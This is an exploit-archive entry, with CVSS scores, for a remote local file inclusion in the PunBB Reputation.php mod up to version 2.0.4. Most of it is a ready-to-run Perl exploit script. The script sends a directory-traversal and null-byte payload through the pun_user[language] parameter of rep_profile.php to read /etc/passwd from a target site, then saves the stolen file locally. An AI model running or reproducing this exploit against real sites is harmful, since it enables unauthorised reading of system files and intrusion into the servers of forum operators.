PunBB Reputation.php Mod <= 2.0.4 Local File Inclusion Exploit

2009-08-18 / 2009-08-19
Credit: Dante90
Risk: Medium
Local: No
Remote: Yes

CVSS Base Score: 6.8/10
Impact Subscore: 6.4/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

#!/usr/bin/perl #[0-Day] PunBB Reputation.php Mod <= v2.0.4 Local File Inclusion Exploit #Coded By Dante90, WaRWolFz Crew #Bug Discovered By: Dante90, WaRWolFz Crew #register_globals = On #magic_quotes_gpc = On use LWP::UserAgent; use HTTP::Cookies; use strict; my $EtcPasswd; my $TransversalDirectory = "./../../../../"; #Transversal Directory my $LFI = "etc/passwd"; #File Inject my $HostName = "http://www.victime_site.org/path/"; #Insert Victime Web Site Link my $Referrer = "http://www.warwolfz.com/"; my $Cookies = new HTTP::Cookies; my $UserAgent = new LWP::UserAgent( agent => 'Mozilla/5.0', max_redirect => 0, cookie_jar => $Cookies, ) or die $!; sub Local_File_Inclusion{ my ($Directory,$Command) = @_; return "./include/reputation/rep_profile.php?pun_user[language]=${Directory}${Command}%00"; } my $Get = $UserAgent->get($HostName.Local_File_Inclusion($TransversalDirectory,$LFI)); if ($Get->content =~ /No such file or directory in/i){ refresh($HostName, "Exploit Filed"); print " * Error extracting sensible data.\n"; print " * Exploit Failed *\n"; print " ------------------------------------------------------ \n\n"; }else{ $EtcPasswd = $Get->content; open ( FILE , ">WaRWolFz.html" ) or die $!; print FILE $EtcPasswd; close ( FILE ); refresh($HostName, "File Saved"); print " * Exploit Successed *\n"; print " ------------------------------------------------------\n\n"; system("pause"); } sub usage{ system("cls"); { print " \n [0-Day] PunBB Reputation.php Mod <= v2.0.4 Local File Inclusion Exploit\n"; print " ------------------------------------------------------ \n"; print " * USAGE: *\n"; print " * cd [Local Disk]:\\[Directory Of Exploit]\\ *\n"; print " * perl name_exploit.pl *\n"; print " ------------------------------------------------------ \n"; print " * Powered By Dante90, WaRWolFz Crew *\n"; print " * www.warwolfz.org - dante90_founder[at]warwolfz.org *\n"; print " ------------------------------------------------------ \n"; }; exit; } sub refresh{ system("cls"); { print " \n [0-Day] PunBB Reputation.php Mod <= v2.0.4 Local File Inclusion Exploit\n"; print " ------------------------------------------------------ \n"; print " * USAGE: *\n"; print " * cd [Local Disk]:\\[Directory Of Exploit]\\ *\n"; print " * perl name_exploit.pl *\n"; print " ------------------------------------------------------ \n"; print " * Powered By Dante90, WaRWolFz Crew *\n"; print " * www.warwolfz.org - dante90_founder[at]warwolfz.org *\n"; print " ------------------------------------------------------ \n"; }; print " * Victime Site: " . $_[0] . "\n"; print " * Etc/Passwd: " . $_[1] . "\n"; } #WaRWolFz



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